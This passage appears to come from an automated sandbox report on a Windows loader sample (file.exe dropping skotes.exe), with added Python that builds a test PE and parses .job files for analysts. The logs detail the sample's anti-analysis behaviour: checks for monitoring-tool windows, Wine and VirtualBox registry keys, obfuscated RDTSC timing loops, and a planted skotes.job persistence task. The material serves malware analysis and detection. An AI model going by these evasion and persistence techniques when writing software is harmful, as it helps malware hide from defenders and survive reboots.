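    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", 0x10B, 14, 0, 0, 0, 0, entry, 0x1000, 0x2000,
                      0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, va, 0x400, 0x1234,  # 0x1234: wrong on purpose
                      2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    head = dos + coff + opt + sec_hdrs
    return head + b"\0" * (0x400 - len(head)) + raw
```

Run triage(open(path, "rb").read()) on a real file. Two caveats: a zero CheckSum is routine for unsigned binaries, so the mismatch in this report matters because the stored value is non-zero; and high entropy on its own also describes legitimately compressed resources, so weigh it together with the entry-point and section-name findings, as the report does.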

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass (2x), PROCMON_WINDOW_CLASS (2x), RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass (6x), PROCMON_WINDOW_CLASS (7x), RegmonClass (3x), Regmonclass, Filemonclass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps (directory) and, inside it, Google Drive.lnk, YouTube.lnk, Sheets.lnk, Gmail.lnk, Slides.lnk, Docs.lnk
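The job file at C:\Windows\Tasks\skotes.job is the persistence artifact in this run. Added example, not part of this report or of any sandbox tooling: a parser for the legacy Task Scheduler .job format (the MS-TSCH section 2.4 layout) that extracts the program, arguments, working directory, author and triggers, then flags the two traits worth checking on a dropped job: an executable under a user-writable directory and a short repeat interval. The constructed build_sample_job() reuses the skotes.exe path from this report, but its trigger (daily, repeating every minute), author, GUID and the USER_WRITABLE path list are assumptions; the page does not give the real contents of skotes.job.

```python
"""Parse a legacy Task Scheduler .job file (MS-TSCH 2.4 layout, as used for
C:\\Windows\\Tasks\\*.job) and flag what a loader's autostart job tends to show:
a program under a user-writable directory and a very short repeat interval."""
import struct
import uuid

TRIGGER_TYPES = {0: "DAILY", 1: "WEEKLY", 2: "MONTHLYDATE", 3: "MONTHLYDOW",
                 4: "ON_IDLE", 5: "AT_SYSTEMSTART", 6: "AT_LOGON"}
# Path fragments a standard user can write to; assumption, extend for your environment.
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\",
                 "\\programdata\\", "\\windows\\temp\\", "\\windows\\tasks\\")


def _unicode_field(data, off):
    """Length-prefixed UTF-16LE string; the 16-bit count includes the terminating NUL."""
    count = struct.unpack_from("<H", data, off)[0]
    text = data[off + 2:off + 2 + 2 * count].decode("utf-16-le").rstrip("\0")
    return text, off + 2 + 2 * count


def parse_job(data):
    """FIXDLEN_DATA is 68 bytes; App Name Len Offset (0x14) and Trigger Offset (0x16)
    locate the variable-length strings and the 48-byte trigger records."""
    app_off, trig_off = struct.unpack_from("<HH", data, 0x14)
    job = {"uuid": str(uuid.UUID(bytes_le=data[4:20])),
           "flags": struct.unpack_from("<I", data, 0x30)[0], "triggers": []}
    off = app_off
    for field in ("application", "parameters", "working_dir", "author", "comment"):
        job[field], off = _unicode_field(data, off)
    count = struct.unpack_from("<H", data, trig_off)[0]
    for i in range(count):
        # Minutes Duration, Minutes Interval, Flags and Trigger Type start 20 bytes into a record.
        duration, interval, _tflags, ttype = struct.unpack_from("<IIII", data, trig_off + 2 + 48 * i + 20)
        job["triggers"].append({"type": TRIGGER_TYPES.get(ttype, f"UNKNOWN({ttype})"),
                                "minutes_duration": duration, "minutes_interval": interval})
    return job


def assess(job, max_benign_interval=5):
    """Reasons to look closer; an empty list means nothing stood out."""
    reasons = []
    app = job["application"].lower()
    if any(marker in app for marker in USER_WRITABLE):
        reasons.append(f"program runs from a user-writable path: {job['application']}")
    for t in job["triggers"]:
        if 0 < t["minutes_interval"] <= max_benign_interval:
            reasons.append(f"{t['type']} trigger repeats every {t['minutes_interval']} minute(s)")
    return reasons


def build_sample_job():
    """Constructed .job mirroring the skotes.job drop in this report; not the real file."""
    def ustr(s):
        return struct.pack("<H", len(s) + 1) + (s + "\0").encode("utf-16-le") if s else struct.pack("<H", 0)
    app = "C:\\Users\\user\\AppData\\Local\\Temp\\abc3bc1985\\skotes.exe"
    strings = ustr(app) + ustr("") + ustr(app.rsplit("\\", 1)[0]) + ustr("user") + ustr("")
    user_data = reserved = struct.pack("<H", 0)
    app_off = 68 + 2                                  # strings follow Running Instance Count
    trig_off = app_off + len(strings) + len(user_data) + len(reserved)
    fixed = (struct.pack("<HH", 0x0600, 1) + uuid.UUID("12345678-1234-5678-1234-567812345678").bytes_le
             + struct.pack("<HHHHHH", app_off, trig_off, 0, 0, 0, 0)
             + struct.pack("<IIIII", 0x20, 0xFFFFFFFF, 0, 0, 0) + b"\0" * 16)   # last run time: never
    # One DAILY trigger from 2024-11-22 that repeats every minute for the whole day (assumed).
    trigger = struct.pack("<HHHHHHHHHHIIIIHHHHHH", 48, 0, 2024, 11, 22, 0, 0, 0, 0, 0,
                          1440, 1, 0, 0, 1, 0, 0, 0, 0, 0)
    return fixed + struct.pack("<H", 0) + strings + user_data + reserved + struct.pack("<H", 1) + trigger
```

On a live system, feed parse_job() every file under C:\Windows\Tasks; a job whose program sits in %LOCALAPPDATA%\Temp, as skotes.job's does here, is worth pulling regardless of its trigger.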

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4x) and C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3x)
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (76 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (3 identical entries)
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6309 second address: 4F6325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F07h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6325 second address: 4F632B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F632B second address: 4F6333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC1E2 second address: 4FC1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC339 second address: 4FC386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F075D128EFBh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F075D128EFAh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F075D128F05h 0x0000001b jmp 00007F075D128F07h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC386 second address: 4FC393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F075CBABEC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC54D second address: 4FC551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC551 second address: 4FC57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABED7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c jl 00007F075CBABEDCh 0x00000012 jo 00007F075CBABECCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC82C second address: 4FC83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC83B second address: 4FC850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC850 second address: 4FC862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F075D128F02h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC862 second address: 4FC86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F075CBABEC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FCB12 second address: 4FCB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FCB18 second address: 4FCB24 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F075CBABEC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FCB24 second address: 4FCB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF549 second address: 4FF5F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F075CBABECEh 0x0000000b popad 0x0000000c xor dword ptr [esp], 2B447AA4h 0x00000013 mov esi, edi 0x00000015 jmp 00007F075CBABED3h 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D2980h], esi 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D2970h], eax 0x0000002a push 00000003h 0x0000002c mov dword ptr [ebp+122D1929h], ebx 0x00000032 push B39EE98Bh 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007F075CBABECFh 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 pop eax 0x00000042 xor dword ptr [esp], 739EE98Bh 0x00000049 and esi, 0F9EBAB5h 0x0000004f lea ebx, dword ptr [ebp+124543D9h] 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F075CBABEC8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 0000001Dh 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f mov ecx, eax 0x00000071 xor ecx, dword ptr [ebp+122D1B3Eh] 0x00000077 push eax 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF5F2 second address: 4FF5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF68F second address: 4FF694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF694 second address: 4FF6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F075D128F09h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F075D128F02h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push edi 0x00000016 jbe 00007F075D128EF8h 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop edi 0x0000001f mov eax, dword ptr [eax] 0x00000021 jp 00007F075D128F04h 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007F075D128EF6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF6E4 second address: 4FF6FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075CBABECFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF6FF second address: 4FF748 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+122D374Eh] 0x0000000f push 00000003h 0x00000011 add dword ptr [ebp+122D18EBh], esi 0x00000017 jmp 00007F075D128F07h 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1929h], edi 0x00000024 push 00000003h 0x00000026 add edx, dword ptr [ebp+122D374Ah] 0x0000002c push 49D5F48Fh 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF748 second address: 4FF74E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF74E second address: 4FF753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF753 second address: 4FF759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF759 second address: 4FF7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 762A0B71h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F075D128EF8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 or cx, C8A2h 0x0000002d lea ebx, dword ptr [ebp+124543E2h] 0x00000033 jmp 00007F075D128EFDh 0x00000038 push eax 0x00000039 pushad 0x0000003a je 00007F075D128EFCh 0x00000040 jp 00007F075D128EF6h 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF7F2 second address: 4FF7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF7F6 second address: 4FF84D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, 6152h 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D31DCh], edx 0x0000001a call 00007F075D128EF9h 0x0000001f push esi 0x00000020 jmp 00007F075D128F01h 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007F075D128F0Eh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF84D second address: 4FF853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF853 second address: 4FF857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF857 second address: 4FF894 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F075CBABED5h 0x00000015 popad 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F075CBABED1h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF894 second address: 4FF8A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF8A3 second address: 4FF8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F075CBABED7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF8C3 second address: 4FF976 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F075D128EF8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000003h 0x00000028 mov edx, 07CD0769h 0x0000002d mov dh, 2Bh 0x0000002f push 00000000h 0x00000031 xor edi, dword ptr [ebp+122D3916h] 0x00000037 push 00000003h 0x00000039 or dword ptr [ebp+122D1929h], edx 0x0000003f jp 00007F075D128EFCh 0x00000045 call 00007F075D128EF9h 0x0000004a jg 00007F075D128F00h 0x00000050 push eax 0x00000051 jmp 00007F075D128F04h 0x00000056 mov eax, dword ptr [esp+04h] 0x0000005a push esi 0x0000005b jmp 00007F075D128EFBh 0x00000060 pop esi 0x00000061 mov eax, dword ptr [eax] 0x00000063 jmp 00007F075D128F07h 0x00000068 mov dword ptr [esp+04h], eax 0x0000006c push ecx 0x0000006d push ecx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520933 second address: 520938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520938 second address: 520942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F075D128EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520942 second address: 520946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA531 second address: 4EA544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F075D128EFEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA544 second address: 4EA54B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E921 second address: 51E931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F075D128EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
